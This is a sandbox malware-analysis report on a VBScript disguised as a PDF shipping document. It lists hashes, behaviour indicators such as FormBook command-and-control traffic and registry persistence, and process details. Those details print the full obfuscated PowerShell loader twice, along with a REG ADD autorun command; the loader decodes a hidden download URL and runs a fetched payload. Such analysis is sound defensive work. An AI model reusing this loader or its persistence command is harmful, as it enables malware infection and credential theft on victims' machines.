File name:

Container_Damage_Inspection_[3204095585].pdf.vbs

Full analysis: https://app.any.run/tasks/b0616428-05b0-4a6d-85e4-3020682f00c4
Verdict: Malicious activity
Analysis date: April 29, 2025, 06:26:28
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

061DAD90A816391BBBA34E653B867F48

SHA1:

D0422AE77DC49A2585573ED27A70692F84F79A54

SHA256:

A22047F904AD1526609574C31CB20120DF70301008A401343FE17451EECF37F9

SSDEEP:

6144:5Is/IKNCfp/mS/Uk9QwX/Vdbo5i2mwbPHgm/3LCuJLr6mz7Qy+G5sO/IcYGsqa6b:L6JI5/u8LeUQJu5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 8076)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 8076)

    • Changes the autorun value in the registry

      • reg.exe (PID: 4920)

    • Connects to the CnC server

      • explorer.exe (PID: 5492)

    • FORMBOOK has been detected (SURICATA)

      • explorer.exe (PID: 5492)

  • SUSPICIOUS

    • Get information on the list of running processes

      • wscript.exe (PID: 7468)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 7556)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 7468)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 7556)

    • The process executes VB scripts

      • explorer.exe (PID: 5492)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 7468)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 7556)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 7468)
      • msiexec.exe (PID: 4428)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 8076)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 8076)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7236)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Creates file in the systems drive root

      • explorer.exe (PID: 5492)

    • Application launched itself

      • powershell.exe (PID: 7556)

    • Contacting a server suspected of hosting an CnC

      • explorer.exe (PID: 5492)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 7468)
      • explorer.exe (PID: 5492)
      • powershell.exe (PID: 7556)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Disables trace logs

      • powershell.exe (PID: 8076)

    • Checks proxy server information

      • powershell.exe (PID: 8076)
      • msiexec.exe (PID: 4428)
      • msiexec.exe (PID: 7848)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Manual execution by a user

      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7556)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 5492)
      • msiexec.exe (PID: 4428)
      • msiexec.exe (PID: 7848)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7248)
      • powershell.exe (PID: 7928)

    • Reads the software policy settings

      • slui.exe (PID: 7660)
      • msiexec.exe (PID: 4428)

    • Auto-launch of the file from Registry key

      • reg.exe (PID: 4920)

    • Creates files or folders in the user directory

      • msiexec.exe (PID: 4428)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
153
Monitored processes
24
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs ping.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs msiexec.exe slui.exe no specs cmd.exe no specs conhost.exe no specs reg.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs msiexec.exe netiougc.exe no specs #FORMBOOK explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
3268\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4428"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
4920REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Skilberens130" /t REG_EXPAND_SZ /d "%Moderliges% -windowstyle 2 $Vaws=(g`p 'HKCU:\Software\Vermiformous195\').'Megilp';%Moderliges% ($Vaws)"C:\Windows\SysWOW64\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
5492C:\WINDOWS\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shcore.dll
7192C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7236"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Skilberens130" /t REG_EXPAND_SZ /d "%Moderliges% -windowstyle 2 $Vaws=(g`p 'HKCU:\Software\Vermiformous195\').'Megilp';%Moderliges% ($Vaws)"C:\Windows\SysWOW64\cmd.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
7248"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Gweducks=[String](Get-Command A:).CommandType;Get-History;$Undtagelsestilstande='Pheeal';$Gweducks+=':';(n`i -p $Gweducks -n Miljsttteordnings -value { param ($Dumpenes);$Adoptionsbevillings=6;do {$hjemsendende+=$Dumpenes[$Adoptionsbevillings];$Adoptionsbevillings+=7} until(!$Dumpenes[$Adoptionsbevillings])$hjemsendende});(n`i -p $Gweducks -n Parenteral -value {param ($Overbefolkningerne);.($Bulklasterne10) ($Overbefolkningerne)});ConvertTo-Html;$Snedkte=Miljsttteordnings 'CreameN TegneeSchizotU.vund.Functiw';$Snedkte+=Miljsttteordnings 'HvavageMaalkabVejnetcstrophldiastei FritiEElastinPyrobiT';$Perfin=Miljsttteordnings 'Un atiMMyldreoMyelosz SkrddiBenzoflDeflexlPlastfaAblati/';$Bureaucratises=Miljsttteordnings 'ForlseTFacettl C artsAptery1Fisket2';$Uforskammethed='Chamae[VareprNEpanorEsundtotHodder.Kri,slSGlosereForkmpR Adresvaslo cIRosilycAmphitEInd bsP amitoTendriIAppellNCas elTMacromMFibrinADrmmesNha aiiA Do ragGalgeneEksercRBioec ]Kancel:Tut or: CathesMdeaftEGrati cPiecetuStrikkrKonstaiSalimeTUd,iksYDroem PLoricaR apninotermiktbeklagoBegittCIranskoTurbo.LUn.lea=Commun$ModstibTys.neutalo.aRberlineRaava.aFlhoppUdks,laC Boja RDip,euaR.burdtShakspiArbe dSRhab,oeBecloas';$Perfin+=Miljsttteordnings '.rnder5Reform.,rivkr0Uricac Rotgut(Prlud.W onstaiChargen OmvurdvognpaoopisthwU justs Terr, IsolerNNannasT Ki,kx Krigss1 Sp,in0Klbest.A.tsra0Ma lut;Pancyc Bl.aklW W,goniFormu n Prein6Afspnd4Minusg;utrosk Udeno xKaryol6Unr li4Affod ;Re ssi UprousrAnalfavpoliti:Re tsa1Rekonv3Supers7Efterk.Arbejd0Opbygg)Sel.kt BurunGBer,gteSe.toscUrfuglkKvindeoBacter/ Restr2jeepes0 Bushm1Supera0Outbu 0gene.i1 .anan0Sojou 1Plante CyclicFProt aiFgtninrUnfrise FlintfDuchesoFortllx Neutr/Adsorb1P stho3Roulea7 Ethno. Hal k0';$Beskftigelsesterapeut=Miljsttteordnings 'ReolenUglenbhs S rmpESal.lerForsee-Re sprAChangegO erineFimbriN.lfonst';$Makrotabels=Miljsttteordnings 'MagnethN.ncoht DesavtAnt hepA sgersDgen g:Tele.o/Satell/GennemhGiffvabCho ega SpaltiBidigir,orosklAnaphyi ToldpnArbejde .ubcu.BrsnotcIndkapoDebatomSkinne/Elfo.sR BubbleFil isg B,indnRetslos UtilikHieroga .sychbDes otsTiepinobed ghpColi.ig Ai,grrRe,lite Phylal tcawisMtrikke BipolrFluid 1krake,0A,anka5 ygger.Prospec Knyens Tai avRevolt>Dugtenh RadietLeathet PadlepKlassosGrillr: scid/Single/PseudokDermoia etroar ,leriuOrto rngrutteaLe svrvMaku arStednaiTraziakjingalsTelefohAuricuaNorpin.SagsgnoRedistrGn dergRin,or/M ddleR SupereS elnggB culunFogedfsPiniesk dacidaBrndegbdefr,ssEghj.roPusherp D lktgDilo.yr,raenseNetkorlP trissTema keTaftforDy gan1Encult0Rembou5Svrind.SnorescSklm,ssDeathsv';$Splendide=Miljsttteordnings 'Trache>';$Bulklasterne10=Miljsttteordnings ' HreneiExcentETreskiX';$Aandsfravrendes='Unchargeable';$Adoptionsbevillingsmpertinence142='\Undermaalers.Tub';Parenteral (Miljsttteordnings 'Bulnin$Ult.acGGigtsyLarrivio SpyttbU supeaPerienLRafleb:.lgtedJAm.ibiu ForelmPollenpDevileA tartpB exlyslCalangeAfvige=Osteot$Alle re St.ukn additvSublim:Kar.ina HifitpPlazanP UdeladRi deraBallsiTFa resALarker+Telegr$Trans,a BakkeDJordlaOSamovaPRevaliT SteghIPreconOLeechknBibehoSThrombBFermateOblastV chenkiS.evesL Moussl Nyttei rsynnModarbGUncurbSE eneom Movesp Spryde,aktueRunsewstKommuniGuslipNSmrb leBug pyN SimulCIsopolEExtrea1Fejrin4capsu 2');Parenteral (Miljsttteordnings 'Ordned$HousemGopf ndLSkrin oBisektBAnimatASputumlUnstag:ApotekM Pep.io frighD ymnopuO lysnL Pr,grAAfnaziRAd ess=Uncomm$RespitmPengeaAFinvasK hirktR BankroCopaentBrugbaaMorulabtheoreeRubberl alt,rS rakke..eryonSD lendpBivirkLElvt.dI AdeleTUlempe(Dampva$GaminesJugginP P ramlShieliEUnsys N chekaDUnderciLatherDLin phePavidb)');Parenteral (Miljsttteordnings $Uforskammethed);$Makrotabels=$Modular[0];$Lutres=(Miljsttteordnings 'Ufejlb$SchumagIndeb.lSinkedo OvervB Sam,rAAntisplSmakk.:BetalirSla geIPriorinKich,aGIerneir Rha iiUnpropDBeskytEAfstemrSuzer nPa,tsheOrgani=HaarsbNDejligEBardcrw B,gse-haagenOHalituBCamperjTel grEAn ettcAbbiestUncomp valerS PantoYChemicsSrenseTSindsrESlatteMPartre.tub rk$P nkfisTheezaNUds rjEdispatdBlomstK Cl maT ragtse');Parenteral ($Lutres);Parenteral (Miljsttteordnings '.gglom$Che asRYtringiKvinkenTrypa gHarleqrCac.priRapi id rachieElec,rrTertsenKvint e Touch.L ngheH KannieFervesaFantasdWittereBestemr OverbsCourte[Blikke$AfrikaBRbounde esponsAdventkAss ref IdepotOverhainonthrg S empe vandblChampisSkyldseunpedasTakt.atFiff,geSoe.elrSpektraT angspSlvvrdeOmkreduTaranttArchpr]Olivin=giulio$ EngenPAnnekseForster recrofWeepabi Arbejn');$Aflbsbrnden=Miljsttteordnings ' SorexD deledo,ninnowMultipnLimas,lCunilao AnkylaLnli edStandsF KieldiRodepalPeephoe';$Amfibietanke=Miljsttteordnings 'Spalte$AbortoRNumeroiForsknnLa hrygRadarsrG owleiBlomstdmennese Sv merHjlpesnSnus.eeva far.Takist$BeedigA Silv.fPodocal Afsidb OstrasAnsttebCly earLreru.nLewis.dKampvoeLhombrn Afkob. Klun IMucosanIcebervUncankoDisconkTjavseeNon ot(Unco,t$AnerkeMMatrona Peak kDigresrrefug,oBrndbyt Prepra GlucabSubpote Lucr lUns.apsslavis, Siste$Pail uSHovedsw,elatiaPolymem,acterp NoddysTurkomiMealmodDiffereShellf)';$Swampside=$Jumpable;Parenteral (Miljsttteordnings 'Vin.ik$Undervg,tivnilOernmaoVarelaBResposaSorbosLD.rmat: MargiU,ematiFDittyiONonlyrRDiademK AttriNpeccanYUnju it BenzoT eredeskrdde=Beyerd(MussieTFodbo eVrngedSHi pobTEnekam- RedriP E serAfurerstaraberHUdrase Ba rac$Altre,sGroovyWehretiAA tiklMSygebep Vri tsUnendei untendKortteeKasimi)');while (!$Uforknytte) {Parenteral (Miljsttteordnings ' diplo$Fors ng CottolRyttero Bra.dbLithomatetraslHa.itu: ,adenRkamme eBlddelm manneeA eptsm Syri b AnsvaeStyloarSkosereDetailrUnfu nsUprigh=Uvilli$DatoliSSpectatDameskr ImmeneSolb dgTienkomUnque aTornfuaLoueyclTvundne AutomnImplore Veldts') ;Parenteral $Amfibietanke;Parenteral (Miljsttteordnings '.onvoj[Uns.gnT Hypheh PinacRpyrosteW,iteia HyperDE.periiPlutocNInchoag Aarig. KosmoTUnsympHP.osphrMistraeBlokt A.entagDCachep] Jette:in erc:Du klisKaraktL iagnoeIndisseRegeripBrser.(Jovite4prece 0Kur.ka0 Asket0pungen)');Parenteral (Miljsttteordnings 'Antape$Gy nasGroduddlBagstaoTrof rBE ikkeATa perLAf ift:PraeseuLax,tif ti.byo RevoiRFededek otanuNcopartyBlastoTKommanTElectrE Tr mb= esvig(Rep odt .askaeMidtersAfh esTFrak.n-SnderrP ruffiaJordlot Alkylhbeboel Minimu$Brad ps BogkawAbsorbaUnder.mrequespWi nersSkand,ityndslDAbandoe Backh)') ;Parenteral (Miljsttteordnings 'Looner$ NonfogUnextrL raakaoOesttrB HarpiaOrdinalArraig:ThalasAAzo,ubnHlsp rtRullerEDefectR S,bcao glaneMSkri,ee enracd Nonliiafsen.AkartognPunkt =Tidier$daydreG UnderLW thdroCopartBDemonoADatoliLWhanki: yraaKRokkesoPattamLAntiabiTolpk S ophth+Prebi +So the%Tirens$ bestim Sandao nusspDOperatUCupuliLForgudaEg istRZoisit.VariancMoulteOstvfnuuByboennRund pT') ;$Makrotabels=$Modular[$Anteromedian]}$Skenens=407275;$Panamansk=32979;Parenteral (Miljsttteordnings ' overs$ opla g TrafiLhelsi.oKnopl BPlebisaElastoLArbejd: RealtBBeloebIBallepsAntispaInddknmRu derPSubcale KapslLPapegjstha,lnET gole unc ff=Overpl buddinGGeninde Ga ant Bran,-Galv nC vangO Sulp NBeadrotPharmae spiseNNationtL thos C.lind$ UddatsUngentwPendafAKo,junMAffranP GasseSMborifI revpdfodstyE');Parenteral (Miljsttteordnings 'Bund n$Husmang ArboulBu heloStrstebUnruffaSkotunl Irror:AutophEDem phn F ggevTe poriDiplomoManessuCustodsAfvejel.trkneyRecit Omsvr =D arma Nonin[IntercSDacapoyBurressClimattimmedieCalorim Unjus.NonexcCSpionsoFicoidn K aphvUpoliteLavederTot edtSandpa] D rri: Cri i:EpigloFEpither TowneoBilledm RagouB skolea PatolspilleseFlintr6Unenta4KoraleS Fra,ktNvn rnr fspeji Harmon Ac.obg.ettic(Holloa$ProjekB uantiiTrio,psIntoleahndvammNondispCresole UninhlSidelnsluf treConpla)');Parenteral (Miljsttteordnings ' Kompa$Prisp.GReignilHoneymoForblfbUnder,A I.drelShiitt:UkrnkeVPhotinARiffleL Skrivu FetistTyknesaOctahyM UnderaKommenRR psetkDataseeSoarinDBusb r ponso=Aimerp Ottere[FrihavSDra aty HystasOnychotHarnesePaakliMEvighe.sackamtKaimane Antifx BilleTMakule. SuperE oreplnUdbasuCPour boRomanidFlaadeiTidsfoN u frsgAxbrev]M zdaf: Delez:I.surmaerkendS FormeCPasserIKildemi Tesse. LempeGLandvseOpsl.gt SuperSo.ienttAnslagrLaid yiMeconin ElveaG Uborg(Du ont$outsetE HypopNBallelv,iskriIKapitaoKarterUUnsinfsHorsecLHermafYForest)');Parenteral (Miljsttteordnings 'Sljfni$E coriGhenhusLM,stico Ln,kabSurrinASkiveblLe tom: VejtruLustraD KontolRabelaANecropnPanp edTykhudsLrerego erogrP Retu H efrugoOrtho,LSystemDspeake=C,bica$stereoVGesjftaVrdierLfodrhoU BestetCleidoAOpklarM ForfgAplanetrPudsenkAzoxyuEAnhidrDViger,. AfsavSmrt lvuDsch bB F rvrSUn eveTUnpictRBegre,I Z nganHaanenG Pan.r(Hie ar$ HalffsUnder kAntebre MetabNInd stEKeratoNCik,ris Taelh,N nedi$ T llipHvdingaInflekNCytozyA AfsigmS ockcaisocryNArmoursOvervrkIndi e)');Parenteral $Udlandsophold;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
7256\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7468"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\Container_Damage_Inspection_[3204095585].pdf.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7524"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
25 174
Read events
25 167
Write events
6
Delete events
1

Modification events

(PID) Process:(4428) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Vermiformous195
Operation:writeName:Megilp
Value:
Get-Service;$Gweducks=[String](Get-Command A:).CommandType;Get-History;$Undtagelsestilstande='Pheeal';$Gweducks+=':';(n`i -p $Gweducks -n Miljsttteordnings -value { param ($Dumpenes);$Adoptionsbevillings=6;do {$hjemsendende+=$Dumpenes[$Adoptionsbevillings];$Adoptionsbevillings+=7} until(!$Dumpenes[$Adoptionsbevillings])$hjemsendende});(n`i -p $Gweducks -n Parenteral -value {param ($Overbefolkningerne);.($Bulklasterne10) ($Overbefolkningerne)});ConvertTo-Html;$Snedkte=Miljsttteordnings 'CreameN TegneeSchizotU.vund.Functiw';$Snedkte+=Miljsttteordnings 'HvavageMaalkabVejnetcstrophldiastei FritiEElastinPyrobiT';$Perfin=Miljsttteordnings 'Un atiMMyldreoMyelosz SkrddiBenzoflDeflexlPlastfaAblati/';$Bureaucratises=Miljsttteordnings 'ForlseTFacettl C artsAptery1Fisket2';$Uforskammethed='Chamae[VareprNEpanorEsundtotHodder.Kri,slSGlosereForkmpR Adresvaslo cIRosilycAmphitEInd bsP amitoTendriIAppellNCas elTMacromMFibrinADrmmesNha aiiA Do ragGalgeneEksercRBioec ]Kancel:Tut or: CathesMdeaftEGrati cPiecetuStrikkrKonstaiSalimeTUd,iksYDroem PLoricaR apninotermiktbeklagoBegittCIranskoTurbo.LUn.lea=Commun$ModstibTys.neutalo.aRberlineRaava.aFlhoppUdks,laC Boja RDip,euaR.burdtShakspiArbe dSRhab,oeBecloas';$Perfin+=Miljsttteordnings '.rnder5Reform.,rivkr0Uricac Rotgut(Prlud.W onstaiChargen OmvurdvognpaoopisthwU justs Terr, IsolerNNannasT Ki,kx Krigss1 Sp,in0Klbest.A.tsra0Ma lut;Pancyc Bl.aklW W,goniFormu n Prein6Afspnd4Minusg;utrosk Udeno xKaryol6Unr li4Affod ;Re ssi UprousrAnalfavpoliti:Re tsa1Rekonv3Supers7Efterk.Arbejd0Opbygg)Sel.kt BurunGBer,gteSe.toscUrfuglkKvindeoBacter/ Restr2jeepes0 Bushm1Supera0Outbu 0gene.i1 .anan0Sojou 1Plante CyclicFProt aiFgtninrUnfrise FlintfDuchesoFortllx Neutr/Adsorb1P stho3Roulea7 Ethno. Hal k0';$Beskftigelsesterapeut=Miljsttteordnings 'ReolenUglenbhs S rmpESal.lerForsee-Re sprAChangegO erineFimbriN.lfonst';$Makrotabels=Miljsttteordnings 'MagnethN.ncoht DesavtAnt hepA sgersDgen g:Tele.o/Satell/GennemhGiffvabCho ega SpaltiBidigir,orosklAnaphyi ToldpnArbejde .ubcu.BrsnotcIndkapoDebatomSkinne/Elfo.sR BubbleFil isg B,indnRetslos UtilikHieroga .sychbDes otsTiepinobed ghpColi.ig Ai,grrRe,lite Phylal tcawisMtrikke BipolrFluid 1krake,0A,anka5 ygger.Prospec Knyens Tai avRevolt>Dugtenh RadietLeathet PadlepKlassosGrillr: scid/Single/PseudokDermoia etroar ,leriuOrto rngrutteaLe svrvMaku arStednaiTraziakjingalsTelefohAuricuaNorpin.SagsgnoRedistrGn dergRin,or/M ddleR SupereS elnggB culunFogedfsPiniesk dacidaBrndegbdefr,ssEghj.roPusherp D lktgDilo.yr,raenseNetkorlP trissTema keTaftforDy gan1Encult0Rembou5Svrind.SnorescSklm,ssDeathsv';$Splendide=Miljsttteordnings 'Trache>';$Bulklasterne10=Miljsttteordnings ' HreneiExcentETreskiX';$Aandsfravrendes='Unchargeable';$Adoptionsbevillingsmpertinence142='\Undermaalers.Tub';Parenteral (Miljsttteordnings 'Bulnin$Ult.acGGigtsyLarrivio SpyttbU supeaPerienLRafleb:.lgtedJAm.ibiu ForelmPollenpDevileA tartpB exlyslCalangeAfvige=Osteot$Alle re St.ukn additvSublim:Kar.ina HifitpPlazanP UdeladRi deraBallsiTFa resALarker+Telegr$Trans,a BakkeDJordlaOSamovaPRevaliT SteghIPreconOLeechknBibehoSThrombBFermateOblastV chenkiS.evesL Moussl Nyttei rsynnModarbGUncurbSE eneom Movesp Spryde,aktueRunsewstKommuniGuslipNSmrb leBug pyN SimulCIsopolEExtrea1Fejrin4capsu 2');Parenteral (Miljsttteordnings 'Ordned$HousemGopf ndLSkrin oBisektBAnimatASputumlUnstag:ApotekM Pep.io frighD ymnopuO lysnL Pr,grAAfnaziRAd ess=Uncomm$RespitmPengeaAFinvasK hirktR BankroCopaentBrugbaaMorulabtheoreeRubberl alt,rS rakke..eryonSD lendpBivirkLElvt.dI AdeleTUlempe(Dampva$GaminesJugginP P ramlShieliEUnsys N chekaDUnderciLatherDLin phePavidb)');Parenteral (Miljsttteordnings $Uforskammethed);$Makrotabels=$Modular[0];$Lutres=(Miljsttteordnings 'Ufejlb$SchumagIndeb.lSinkedo OvervB Sam,rAAntisplSmakk.:BetalirSla geIPriorinKich,aGIerneir Rha iiUnpropDBeskytEAfstemrSuzer nPa,tsheOrgani=HaarsbNDejligEBardcrw B,gse-haagenOHalituBCamperjTel grEAn ettcAbbiestUncomp valerS PantoYChemicsSrenseTSindsrESlatteMPartre.tub rk$P nkfisTheezaNUds rjEdispatdBlomstK Cl maT ragtse');Parenteral ($Lutres);Parenteral (Miljsttteordnings '.gglom$Che asRYtringiKvinkenTrypa gHarleqrCac.priRapi id rachieElec,rrTertsenKvint e Touch.L ngheH KannieFervesaFantasdWittereBestemr OverbsCourte[Blikke$AfrikaBRbounde esponsAdventkAss ref IdepotOverhainonthrg S empe vandblChampisSkyldseunpedasTakt.atFiff,geSoe.elrSpektraT angspSlvvrdeOmkreduTaranttArchpr]Olivin=giulio$ EngenPAnnekseForster recrofWeepabi Arbejn');$Aflbsbrnden=Miljsttteordnings ' SorexD deledo,ninnowMultipnLimas,lCunilao AnkylaLnli edStandsF KieldiRodepalPeephoe';$Amfibietanke=Miljsttteordnings 'Spalte$AbortoRNumeroiForsknnLa hrygRadarsrG owleiBlomstdmennese Sv merHjlpesnSnus.eeva far.Takist$BeedigA Silv.fPodocal Afsidb OstrasAnsttebCly earLreru.nLewis.dKampvoeLhombrn Afkob. Klun IMucosanIcebervUncankoDisconkTjavseeNon ot(Unco,t$AnerkeMMatrona Peak kDigresrrefug,oBrndbyt Prepra GlucabSubpote Lucr lUns.apsslavis, Siste$Pail uSHovedsw,elatiaPolymem,acterp NoddysTurkomiMealmodDiffereShellf)';$Swampside=$Jumpable;Parenteral (Miljsttteordnings 'Vin.ik$Undervg,tivnilOernmaoVarelaBResposaSorbosLD.rmat: MargiU,ematiFDittyiONonlyrRDiademK AttriNpeccanYUnju it BenzoT eredeskrdde=Beyerd(MussieTFodbo eVrngedSHi pobTEnekam- RedriP E serAfurerstaraberHUdrase Ba rac$Altre,sGroovyWehretiAA tiklMSygebep Vri tsUnendei untendKortteeKasimi)');while (!$Uforknytte) {Parenteral (Miljsttteordnings ' diplo$Fors ng CottolRyttero Bra.dbLithomatetraslHa.itu: ,adenRkamme eBlddelm manneeA eptsm Syri b AnsvaeStyloarSkosereDetailrUnfu 